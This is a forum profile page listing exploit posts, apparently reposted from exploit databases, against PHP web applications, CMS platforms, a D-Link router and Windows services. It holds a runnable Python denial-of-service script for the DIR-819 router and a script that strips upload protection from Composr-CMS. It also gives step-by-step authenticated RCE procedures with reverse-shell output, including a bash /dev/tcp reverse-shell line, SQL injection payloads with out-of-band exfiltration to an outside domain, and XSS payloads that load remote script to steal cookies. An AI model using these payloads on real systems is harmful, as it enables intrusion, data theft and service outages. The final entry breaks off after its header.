HireHackking

Everything posted by HireHackking

  1. ## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE
     ## Exploit Author: nu11secur1ty
     ## Date: 03.17.2023
     ## Vendor: https://www.sourcecodester.com/user/257130/activity
     ## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
     ## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/

     ## Description:
     The Employee Performance Evaluation System-1.0 suffers from File Inclusion - RCE Vulnerabilities. The usual user of this system is allowed to submit a malicious file or upload a malicious file to the server. After that, this user can remotely execute the already included malicious file on the server of the victim. This can bring the system to disaster or can destroy all information that is inside, or this information can be stolen.

     STATUS: CRITICAL Vulnerability

     [+]Get Info:
     ```PHP
     <?php
     // by nu11secur1ty - 2023
     phpinfo();
     ?>
     ```

     [+]Exploit:
     ```PHP
     <?php
     // by nu11secur1ty - 2023
     // Old Name Of The file
     $old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ;
     // New Name For The File
     $new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ;
     // using rename() function to rename the file
     rename( $old_name, $new_name) ;
     ?>
     ```

     ## Proof Of Concept:
     https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0

     --
     System Administrator - Infrastructure Engineer
     Penetration Testing Engineer
     Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
     0day Exploit DataBase https://0day.today/
     home page: https://www.nu11secur1ty.com/
     hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
     nu11secur1ty <http://nu11secur1ty.com/>
  2. # Exploit Title: DLink DIR 819 A1 - Denial of Service
     # Date: 30th September, 2022
     # Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
     # Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
     # Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
     # Tested on: Firmware Version - 1.06 Hardware Version - A1
     # CVE : CVE-2022-40946
     #
     # Github: https://github.com/whokilleddb/dlink-dir-819-dos
     #
     # $ ./exploit.py -i 192.168.0.1
     # [+] DLink DIR-819 DoS exploit
     # [i] Address to attack: 192.168.0.1
     # [i] Using SSL: False
     # [i] Request Timeout: 30s
     # [i] Buffer Length: 19
     # [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
     # [+] Exploit Successful!

     ```python
     #!/usr/bin/env python3
     import sys
     import string
     import urllib3
     import requests
     import argparse
     import random
     import socket
     from rich import print

     # Disable SSL Warnings
     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

     # Globals
     TIMEOUT = 30
     #BUFFER_LEN = 19
     BUFFER_LEN = 32

     # Class to exploit
     class Exploit:
         def __init__(self, ip, is_ssl):
             """Initialize the constructor"""
             self.ip = ip
             self.is_ssl = is_ssl
             _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
             if self.is_ssl:
                 self.payload = f"https://{_payload}"
             else:
                 self.payload = f"http://{_payload}"

         def show(self):
             """Show the parameters"""
             print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
             print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
             print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
             print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
             print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")

         def run(self):
             """Run the exploit"""
             print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
             self.show()
             try:
                 r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
                 if "Internal Error" in r.text:
                     print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
                     print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
                 else:
                     print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
             except requests.exceptions.Timeout:
                 print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
             except Exception as e:
                 print(f"Error occurred as: {e}")

     def main():
         """Main function to run"""
         parser = argparse.ArgumentParser(description="DLink DIR-819 Unauthenticated DoS")
         parser.add_argument('-i', '--ip', required=True, help="IP of the router")
         parser.add_argument('-s', '--ssl', required=False, action="store_true")
         opts = parser.parse_args()
         try:
             ip = socket.gethostbyname(opts.ip)
         except socket.error:
             print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
             return
         is_ssl = opts.ssl
         exploit = Exploit(ip, is_ssl)
         exploit.run()

     if __name__ == '__main__':
         main()
     ```
  3. # Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution
     # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
     # Date: 3rd Mar'2022
     # CVE ID: CVE-2022-26521
     # Confirmed on release 1.3.2
     # Vendor: https://www.abantecart.com/download
     ###############################################
     #Step1- Login with Admin Credentials
     #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions
     #Step3- Now Goto Add Media=>Add Resource=> Upload php web shell
     #Step4- Copy the Resource URL location and execute it in the browser e.g. : Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell:

     ```
     listening on [any] 4477 ...
     connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532
     Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
      11:17:51 up 2:15, 1 user, load average: 1.91, 1.93, 1.52
     USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
     bitnami  tty1     -                09:05    1:05m  0.20s  0.01s -bash
     uid=1(daemon) gid=1(daemon) groups=1(daemon)
     /bin/sh: 0: can't access tty; job control turned off
     $ whoami
     daemon
     $ id
     uid=1(daemon) gid=1(daemon) groups=1(daemon)
     $
     ```
  4. # Exploit Title: Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)
     # Date: 2022-07-02
     # Exploit Author: Ali Alipour
     # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
     # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
     # Version: 1.0
     # Tested on: Windows 10 Pro x64 - XAMPP Server
     # CVE : CVE-2022-35155

     #Issue Detail:
     The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

     # Vulnerable page: /buspassms/download-pass.php
     # Vulnerable Parameter: searchdata [ POST Data ]

     #Request :
     ```
     POST /buspassms/download-pass.php HTTP/1.1
     Host: 127.0.0.1
     Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3
     Origin: https://127.0.0.1
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Upgrade-Insecure-Requests: 1
     Referer: https://127.0.0.1/buspassms/download-pass.php
     Content-Type: application/x-www-form-urlencoded
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US;q=0.9,en;q=0.8
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
     Connection: close
     Cache-Control: max-age=0
     Content-Length: 25

     searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=
     ```

     #Response :
     ```
     HTTP/1.1 200 OK
     Date: Fri, 01 Jul 2022 00:14:25 GMT
     Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8
     X-Powered-By: PHP/7.4.8
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Cache-Control: no-store, no-cache, must-revalidate
     Pragma: no-cache
     Content-Length: 6425
     Connection: close
     Content-Type: text/html; charset=UTF-8

     <!DOCTYPE html>
     <html lang="en">
     <head>
     <title>Bus Pass Management System || Pass Page</title>
     <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba
     ...[SNIP]...
     <h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>
     ...[SNIP]...
     ```
  5. # Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution
     # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
     # Date: 7th March 2022
     # CVE ID: CVE-2022-26982
     # Confirmed on release 2.1.1
     # Vendor: https://download.simplemachines.org/
     # Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!
     ###############################################
     #Step1- Login with Admin Credentials
     #Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php
     #Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>
     #Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page
     #Step5- Now click on "Themes and Layout" and you will get the reverse shell: E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:

     ```
     listening on [any] 4477 ...
     connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276
     bash: cannot set terminal process group (1334): Inappropriate ioctl for device
     bash: no job control in this shell
     daemon@debian:/opt/bitnami/simplemachinesforum$ whoami
     whoami
     daemon
     daemon@debian:/opt/bitnami/simplemachinesforum$ id
     id
     uid=1(daemon) gid=1(daemon) groups=1(daemon)
     daemon@debian:/opt/bitnami/simplemachinesforum$
     ```
  6. # Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3
     # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
     # Date: 7th March 2022
     # CVE ID: CVE-2022-26986
     # Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above...
     # Vendor: https://www.impresscms.org
     # Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3
     ###############################################
     #Step1- Login with Admin Credentials
     #Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):

     ```
     POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1
     Host: 192.168.56.117
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701
     Content-Length: 1011
     Origin: http://192.168.56.117
     Connection: close
     Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1
     Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3
     Upgrade-Insecure-Requests: 1

     -----------------------------40629177308912268471540748701
     Content-Disposition: form-data; name="mimetypeid"

     1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)
     -----------------------------40629177308912268471540748701
     Content-Disposition: form-data; name="extension"

     bin
     -----------------------------40629177308912268471540748701
     Content-Disposition: form-data; name="types"

     application/octet-stream
     -----------------------------40629177308912268471540748701
     Content-Disposition: form-data; name="name"

     Binary File/Linux Executable
     -----------------------------40629177308912268471540748701
     Content-Disposition: form-data; name="icms_page_before_form"

     http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype
     -----------------------------40629177308912268471540748701
     Content-Disposition: form-data; name="op"

     addmimetype
     -----------------------------40629177308912268471540748701
     Content-Disposition: form-data; name="modify_button"

     Submit
     -----------------------------40629177308912268471540748701--
     ```

     Vulnerable Payload: 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP)

     Output:
     ```
     web application technology: Apache 2.4.52, PHP 7.4.27
     back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
     available databases [6]:
     [*] impresscms
     [*] information_schema
     [*] mysql
     [*] performance_schema
     [*] phpmyadmin
     [*] test
     ```
  7. # Exploit Title: Password Manager for IIS v2.0 - XSS
     # Exploit Author: VP4TR10T
     # Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
     # Software Link: http://passwordmanager.adiscon.com/
     # Version: *Version 2.0
     # Tested on: WINDOWS
     # CVE : CVE-2022-36664

     Affected URI (when changing user password): POST /isapi/PasswordManager.dll HTTP/1.1

     Affected Parameter in http payload: *ReturnURL*=<script>alert(document.cookie)</script>

     *Cordially,*
  8. # Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution
     # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
     # Date: 26th Feb'2022
     # CVE ID: CVE-2022-26149
     # Confirmed on release 2.8.3-pl
     # Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt
     # Vendor: https://modx.com/download
     ###############################################
     #Step1- Login with Admin Credentials
     #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Add the php file extension under the "Uploadable File Types" option available in "System Settings"
     #Step3- Now Goto Media=>Media Browser and upload the Shell.php
     #Step4- Now visit http://IP_Address/Shell.php and get the reverse shell:

     ```
     listening on [any] 4477 ...
     connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056
     bash: cannot set terminal process group (1445): Inappropriate ioctl for device
     bash: no job control in this shell
     daemon@debian:/opt/bitnami/modx$
     ```
  9. ## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
     ## Exploit Author: nu11secur1ty
     ## Date: 10.04.2022
     ## Vendor: Free PHP Projects & Ideas with Source Codes for Students | mayurik <https://www.mayurik.com/>
     ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
     ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

     ## Description:
     The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can craft a very malicious HTTPS URL redirecting to a very malicious URL. When the victim clicks on this crafted URL, the game will be over for him.

     [+]Payload REQUEST:
     ```HTML
     GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1
     Host: pwnedhost.com
     Accept-Encoding: gzip, deflate
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Accept-Language: en-US;q=0.9,en;q=0.8
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
     Connection: close
     Cache-Control: max-age=0
     Upgrade-Insecure-Requests: 1
     Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"
     Sec-CH-UA-Platform: Windows
     Sec-CH-UA-Mobile: ?0
     ```

     [+]Payload RESPONSE:
     ```burp
     HTTP/1.1 200 OK
     Date: Tue, 04 Oct 2022 09:44:55 GMT
     Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
     X-Powered-By: PHP/8.1.6
     Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Cache-Control: no-store, no-cache, must-revalidate
     Pragma: no-cache
     Content-Length: 6140
     Connection: close
     Content-Type: text/html; charset=UTF-8

     <link rel="stylesheet" href="assets/css/popup_style.css">
     <style>
     .footer1 { position: fixed; bottom: 0; width: 100%; color: #5c4ac7; text-align: center; }
     </style>
     <!DOCTYPE html>
     <html lang="en">
     <head>
     <meta charset="utf-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta charset="utf-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui">
     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
     <meta name="description" content="">
     <meta name="keywords" content="">
     <meta name="author" content="">
     <link rel="icon" type="image/png" sizes="16x16" href="assets/uploadImage/Logo/favicon.png">
     <style type="text/css"> @media print { #printbtn { display : none; } } </style>
     <title>Youthappam Canteen Management System - by Mayuri K. Freelancer</title>
     <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
     <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
     <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" />
     <link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet">
     <link href="assets/css/helper.css" rel="stylesheet">
     <link href="assets/css/style.css" rel="stylesheet">
     <link rel="stylesheet" href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
     <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
     <link href="assets/css/lib/calendar2/pignose.calendar.min.css" rel="stylesheet">
     <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
     <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css" rel="stylesheet">
     <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
     <script type="text/javascript">
     google.charts.load("current", {packages:["corechart"]});
     google.charts.setOnLoadCallback(drawChart);
     function drawChart() {
       var data = google.visualization.arrayToDataTable([ ['Food', 'Average sale per Day'], ['Masala dosa', 11], ['Chicken 65 ', 2], ['Karapu Boondi', 2], ['Bellam Gavvalu', 2], ['Gummadikaya Vadiyalu', 7] ]);
       var options = { title: 'Food Average Sale per Day', pieHole: 0.4, };
       var chart = new google.visualization.PieChart(document.getElementById('donutchart'));
       chart.draw(data, options);
     }
     </script>
     </head>
     <body class="fix-header fix-sidebar">
     <div id="page"></div>
     <div id="loading"></div>
     <div id="main-wrapper">
     <div class="unix-login">
     <div class="container-fluid" style="background-image: url('assets/myimages/background.jpg'); background-color: #ffffff;background-size:cover">
     <div class="row">
     <div class="col-lg-4 ml-auto">
     <div class="login-content">
     <div class="login-form">
     <center><img src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
     <form action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/" target="_blank" rel="noopener nofollow ugc"> <img src="https:/ raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif" method="post" id="loginForm">
     <div class="form-group">
     <input type="text" name="username" id="username" class="form-control" placeholder="Username" required="">
     </div>
     <div class="form-group">
     <input type="password" id="password" name="password" class="form-control" placeholder="Password" required="">
     </div>
     <button type="submit" name="login" class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>
     <!-- <div class="forgot-phone text-right f-right"> <a href="#" class="text-right f-w-600"> Forgot Password?</a> </div> -->
     <div class="forgot-phone text-left f-left">
     <a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development Requirement&body = I saw your projects. I want to develop a project" class="text-right f-w-600"> Click here to contact me</a>
     </div>
     </form>
     </div>
     </div>
     </div>
     </div>
     </div>
     </div>
     </div>
     <script src="./assets/js/lib/jquery/jquery.min.js"></script>
     <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script>
     <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script>
     <script src="./assets/js/jquery.slimscroll.js"></script>
     <script src="./assets/js/sidebarmenu.js"></script>
     <script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>
     <script src="./assets/js/custom.min.js"></script>
     <script>
     function onReady(callback) {
       var intervalID = window.setInterval(checkReady, 1000);
       function checkReady() {
         if (document.getElementsByTagName('body')[0] !== undefined) {
           window.clearInterval(intervalID);
           callback.call(this);
         }
       }
     }
     function show(id, value) { document.getElementById(id).style.display = value ? 'block' : 'none'; }
     onReady(function () { show('page', true); show('loading', false); });
     </script>
     </body>
     </html>
     ```

     ## Reproduce:
     [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management)

     ## Proof and Exploit:
     [href](https://streamable.com/emg0zo)

     --
     System Administrator - Infrastructure Engineer
     Penetration Testing Engineer
     Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
     home page: https://www.nu11secur1ty.com/
     hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
     nu11secur1ty <http://nu11secur1ty.com/>
  10. Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
      # Date: 2022-10-02
      # Exploit Author: Prasheek Kamble
      # Vendor Homepage: https://phpgurukul.com/
      # Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
      # Version: V 1.2
      # Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
      # Tested on MAC OS, XAMPP

      Steps to reproduce:
      1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
      2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field
      3) Click on Add Details and intercept the request in Burpsuite
      4) After this, the details have been submitted.
      5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
      6) Now attacker gets the details of victim like ip address, cookies of Victim, etc
      7) So attacker is successful in getting the victim's ip address and other details.

      #POC's
      https://ibb.co/kSxFp2g
      https://ibb.co/VvSVRsy
      https://ibb.co/mSGp4FX
      https://ibb.co/hXbJ9TZ
      https://ibb.co/M6vS08S
  11. # Exploit Title: Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution
      # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
      # Date: 12th January,2022
      # CVE ID: CVE-2021-46360
      # Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS
      # Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py
      # Vendor: https://compo.sr/download.htm
      ###############################################
      #Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

      ```python
      #!/usr/bin/python3
      import requests
      from bs4 import BeautifulSoup
      import time

      cookies = {
          'has_cookies': '1',
          'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic
          'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',
          'last_visit': '1641783779',
          'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic
      }

      headers = {
          'Connection': 'keep-alive',
          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
          'Content-Type': 'application/x-www-form-urlencoded',
          'Accept': '*/*',
          'Origin': 'http://192.168.56.116',
          'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',
          'Accept-Language': 'en-US,en;q=0.9',
      }

      params = (
          ('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic
      )

      data = {
          '_data': 'command=rm .htaccess', # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)
          'csrf_token': 'ef14cc258d93a' #You need to change this as it is dynamic
      }

      r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a', headers=headers, params=params, cookies=cookies, data=data, verify=False)
      soup = BeautifulSoup(r.text, 'html.parser')
      #datap=response.read()
      print (soup)
      ```

      #Step2- Now visit the Content=>File/Media Library and then upload any .php web shell
      #Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

      ```
      ┌─[ci@parrot]─[~]
      └──╼ $nc -lvvnp 4444
      listening on [any] 4444 ...
      connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984
      Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
       13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03
      USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
      user     :0       :0               Thu17   ?xdm?  46:51   0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
      uid=1(daemon) gid=1(daemon) groups=1(daemon)
      /bin/sh: 0: can't access tty; job control turned off
      $ whoami
      daemon
      $ id
      uid=1(daemon) gid=1(daemon) groups=1(daemon)
      $ pwd
      /
      $
      ```
  12. ## Exploit Title: Canteen-Management v1.0 - SQL Injection
      ## Exploit Author: nu11secur1ty
      ## Date: 10.04.2022
      ## Vendor: https://www.mayurik.com/
      ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
      ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi

      ## Description:
      The username parameter from Canteen-Management1.0-2022 appears to be vulnerable to SQL injection attacks. The malicious user can attack this system remotely by using this vulnerability to steal all information from the database of this system.

      STATUS: HIGH Vulnerability

      [+]Payload:
      ```mysql
      ---
      Parameter: username (POST)
          Type: boolean-based blind
          Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
          Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=

          Type: time-based blind
          Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
          Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login=
      ---
      ```

      ## Reproduce:
      [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)

      ## Proof and Exploit:
      [href](https://streamable.com/vvz2lh)

      --
      System Administrator - Infrastructure Engineer
      Penetration Testing Engineer
      Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
      home page: https://www.nu11secur1ty.com/
      hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
      nu11secur1ty <http://nu11secur1ty.com/>
  13. # Exploit Title: Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path
      # Exploit by: Luis Martinez
      # Discovery Date: 2022-10-05
      # Vendor Homepage: https://www.gestionaleopen.org/
      # Software Link : https://www.gestionaleopen.org/download/
      # Tested Version: 12.00.00
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 Pro x64 es

      # Step to discover Unquoted Service Path:
      ```
      C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DB_GO_80" | findstr /i /v """

      DB_GO_80    DB_GO_80    C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80    Auto
      ```

      # Service info:
      ```
      C:\>sc qc "DB_GO_80"
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: DB_GO_80
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : DB_GO_80
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem
      ```

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  14. # Exploit Title: Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path
      # Exploit Author: Luis Martinez
      # Discovery Date: 2022-10-05
      # Vendor Homepage: https://www.infonetsoftware.com
      # Software Link : https://www.infonetsoftware.com/soft/instalar_Medicont_x.exe
      # Tested Version: 3.7.27
